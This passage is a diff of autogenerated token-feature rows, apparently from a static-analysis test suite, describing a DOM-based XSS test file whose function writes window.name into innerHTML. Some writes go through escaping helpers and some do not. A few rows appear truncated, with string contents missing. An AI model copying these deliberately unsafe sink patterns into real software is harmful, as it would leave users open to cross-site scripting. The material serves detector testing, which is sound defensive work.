autogenerated/Xss/DomBasedXss/sanitiser.js:10:14:10:21 | toString | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:14:10:21 | toString | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:10:14:10:21 | toString | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:11:11:11:17 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:11:11:11:17 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:11:11:11:17 | replace | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:11:11:11:17 | replace | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:11:11:11:17 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:11:19:11:22 | /'/g | CalleeFlexibleAccessPath | s.toString().replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:11:19:11:22 | /'/g | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:11:19:11:22 | /'/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14818,6 +107768,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:11:25:11:29 | '%22' | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | | autogenerated/Xss/DomBasedXss/sanitiser.js:11:25:11:29 | '%22' | enclosingFunctionName | escapeAttr | | autogenerated/Xss/DomBasedXss/sanitiser.js:11:25:11:29 | '%22' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:12:11:12:17 | replace | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:12:11:12:17 | replace | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/sanitiser.js:12:11:12:17 | replace | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | +| autogenerated/Xss/DomBasedXss/sanitiser.js:12:11:12:17 | replace | enclosingFunctionName | escapeAttr | +| autogenerated/Xss/DomBasedXss/sanitiser.js:12:11:12:17 | replace | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:12:19:12:22 | /"/g | CalleeFlexibleAccessPath | s.toString().replace().replace | | autogenerated/Xss/DomBasedXss/sanitiser.js:12:19:12:22 | /"/g | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:12:19:12:22 | /"/g | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -14832,66 +107787,297 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:12:25:12:29 | '%27' | enclosingFunctionBody | s s toString replace /'/g %22 replace /"/g %27 | | autogenerated/Xss/DomBasedXss/sanitiser.js:12:25:12:29 | '%27' | enclosingFunctionName | escapeAttr | | autogenerated/Xss/DomBasedXss/sanitiser.js:12:25:12:29 | '%27' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:15:0 | this | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:15:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:15:0 | this | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:15:0 | this | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:15:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | 'arguments' object of function test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | 'arguments' object of function test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | exceptional return of function test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | exceptional return of function test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | functio ... OT OK\\n} | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | return of function test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | return of function test | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:1:49:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:10:15:13 | test | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:10:15:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:15:10:15:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:13 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:13 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:13 | tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:13 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:13 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted ... ow.name | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted ... ow.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted ... ow.name | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted ... ow.name | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:7:16:27 | tainted ... ow.name | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:22 | window | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:22 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:22 | window | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:22 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:22 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:27 | window.name | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:27 | window.name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:27 | window.name | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:27 | window.name | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:17:16:27 | window.name | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:24:16:27 | name | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:24:16:27 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:24:16:27 | name | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:24:16:27 | name | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:16:24:16:27 | name | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:9 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:9 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:9 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:9 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:9 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt = d ... ement() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt = d ... ement() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt = d ... ement() | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt = d ... ement() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:7:17:36 | elt = d ... ement() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:20 | document | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:20 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:20 | document | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:20 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:20 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:34 | documen ... Element | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:34 | documen ... Element | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:34 | documen ... Element | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:34 | documen ... Element | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:34 | documen ... Element | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | documen ... ement() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | documen ... ement() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | documen ... ement() | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | documen ... ement() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | documen ... ement() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | exceptional return of documen ... ement() | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | exceptional return of documen ... ement() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | exceptional return of documen ... ement() | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | exceptional return of documen ... ement() | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:13:17:36 | exceptional return of documen ... ement() | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:22:17:34 | createElement | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:22:17:34 | createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:22:17:34 | createElement | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:22:17:34 | createElement | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:17:22:17:34 | createElement | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:5 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:5 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:5 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:5 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:5 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:15 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:15 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:15 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:15 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:15 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:91 | elt.inn ... "" | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:91 | elt.inn ... "" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:91 | elt.inn ... "" | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:91 | elt.inn ... "" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:3:18:91 | elt.inn ... "" | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:7:18:15 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:7:18:15 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:7:18:15 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:7:18:15 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:7:18:15 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:30 | " escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:30 | "    ' + escapeHtml() + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:52 | " escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:52 | "" | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:60 | "" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:60 | "" | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:60 | "" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:60 | "" | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:82 | " escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:82 | "" | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:91 | "" | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:91 | "" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:18:19:18:91 | "" | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
